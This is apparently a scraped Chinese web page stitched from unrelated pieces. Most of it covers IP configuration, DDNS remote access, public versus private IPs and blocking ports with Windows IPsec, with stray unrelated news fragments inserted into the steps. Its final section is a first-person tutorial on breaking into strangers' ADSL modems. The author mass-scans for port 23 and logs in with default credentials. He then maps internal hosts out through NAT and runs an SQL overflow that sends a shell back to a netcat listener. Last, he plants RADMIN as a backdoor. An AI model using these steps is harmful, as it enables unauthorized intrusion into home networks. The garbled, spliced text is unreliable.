1、 点击属性,如果你已经击中你的网络邻居。
2、 右键单击本地链接,然后单击属性。
3、 选择Internet协议(TCP/IP ),然后单击属性。
4、 单击右下角的高级选项。
5、 在IP地址选项中,单击添加。
6、 输入所访问ip段的ip。(确保IP不被占用)(变态司机碾压巨熊)
7、 记住还要添加网关。设置完成后点击OK,看是否能ping通。(汪东兴去世)
本文到此结束,希望对大家有所帮助花生壳可以做。
1,在这台设备上安装花生壳,申请域名,这个你应该会吧。好了后测试一下,可以ping到就安装对了。
2,在路由器上将这个内网地址的权限放开,普通路由器的话,找到DMZ设置,把这台设备的ip放入DMZ(内网192的地址,不是公网IP)
3,设置你的这台PC,允许远程访问。详细步骤也需要你自己搞定,应该不难。可以尝试远程连接自己的回环地址测试,(127001标示本机)
4,做到这里,那基本上就成功了。换一台电脑,直接远程连接你在花生壳上的那个域名,只要花生壳没故障,正常跳转了,那你应该直接看到这个设备的登陆窗口。
5,登进来了,一切就OK了吧,这台设备在局域网内。它理论上可以访问局域网中的任何设备吧,用这个做跳板,剩下的很容易搞定吧。私网也叫内网
公网也叫外网
一般的局域网用户都是内网用户
如果你的电脑是直接连入互联网的,没有其他局域网用户,那么你的电脑只要上网,就处于外网状态
处于外网的电脑,如果被攻击,则受攻击的是电脑本身
处于内网的电脑,如果被攻击,首先被攻击的是服务器(如果没有服务器,则是路由器)
1、外网IP包括:ADSL拨号的动态IP用动态解析域名来绑定IP,又叫动态域名;固定的外网IP(这种多半为网吧的IP)即,整个网吧的那个主IP。
外网IP指的是:打开ADSL路由功能的用户的外网IP就应该是ADSL设备的IP,网吧里的外网IP是指整个网吧的主IP,校园网的外网IP就是整个校园网的那个主IP,小区网的外网IP与校园网同理。
长宽的用户就要试下了,可以上论坛,看看你的IP是多少,那么那个IP就是你要绑定的,所有的内网用户都可以这样查的,论坛上的IP就是你要绑定的IP。
2、内网IP是指,也就是局域网网络地址,内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet。内网的计算机可向Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求。
内网穿透:
即NAT穿透,采用端口映射,让外网的电脑找到处于内网的电脑,同时也可基于 >
方法:在局域网内部的任一PC或服务器上运行到花生壳内网穿透客户端,此时域名解析到的IP地址是局域网网关出口处的公网IP地址,再在网关处做端口映射指向监控设备即可。
百度百科-内网ip;百度百科-外网IP
外网IP的内网IP是一样的?内网的你应该是192168的,如果是局域网访问你机子上的网站,只需要输入你内网的IP地址就可以了
外网的IP是对于互联网的,要想做网站服务器,需要有一个固定的IP地址。你把端口关了,下面介绍如何在xp/2k/2003下手动关闭这些网络端口。
1、点击 "开始菜单/设置/控制面板/管理工具",双击打开"本地策略",选中"ip安全策略,在本地计算机“右边的空白位置右击鼠标,d出快捷菜单,选择"创建ip安全策略”,d出向导。在向导中点击下一步,下一步,当显示“安全通信请求”画面时,把“激活默认相应规则”左边的钩去掉,点“完成”就创建了一个新的ip安全策略。
2、右击该ip安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按纽添加新的规则,随后d出“新规则属性”对话框,在画面上点击“添加”按纽,d出ip筛选器列表窗口。在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的"添加"按纽添加新的筛选器。
3、进入“筛选器属性”对话框,首先看到的是寻地址,源地址选“任何ip地址”,目标地址选“我的ip地址”,点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“tcp”,然后在“到此端口”的下的文本框中输入“135”,点击确定。这样就添加了一个屏蔽tcp135 端口的筛选器,可以防止外界通过135端口连上你的电脑。
点击确定后回到筛选器列表的对话框,可以看到已经添加了一条策略。重复以上步骤继续添加tcp 137 139 445 593 端口和udp 135 139 445 端口,为它们建立相应的筛选器。
重复以上步骤添加tcp 125 2745 3127 6129 3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击确定按纽。
4、在“新规则属性”对话框中,选择“新ip筛选器列表”然后点击其左边的复选框,表示已经激活。最后点击“筛选器 *** 作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,进行“阻止” *** 作,在“新筛选器 *** 作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”。
5、进入“新规则属性”对话框,点击“新筛选器 *** 作”,选取左边的复选框,表示已经激活,点击“关闭”按钮,关闭对话框。最后“新ip安全策略属性”对话框,在“新的ip筛选器列表”左边打钩,按确定关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的ip安全策略,然后选择“指派”。
重新启动后,上述端口就可以关闭了!电脑就安全多了!!!
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL Modem的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。
一、扫描
现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218xxxxxxxxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。
二、映射
入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢在此,我选择了猜测。一般来说,MODEM的内网IP缺省是19216811,而大多数就把自己主机的IP设成19216812。因此我们只要试试把19216812的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是19216812到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:19216812,到此19216812已经透明地映射到19216811上了,我们访问ADSL MODEM就等于访问主机19216812了。 三、检测漏洞
现在我们再请出SUPPERSCAN对218xxxxxxxxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低B啊。
四、溢出
既然没有弱口令,也没开80,那只好从溢出方面着手了,但没开80 21 也就webdav sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行 。
五、募然回首,那人却在,灯火阑珊处
看来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?)心动不如行动,现在只好死马当活马医了,于是:
nc -v -l 99
sql2 218xxxxxxxxx 0 218xxxxxxxxx 99
bingle 成功地得到一个shell了。
六、设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)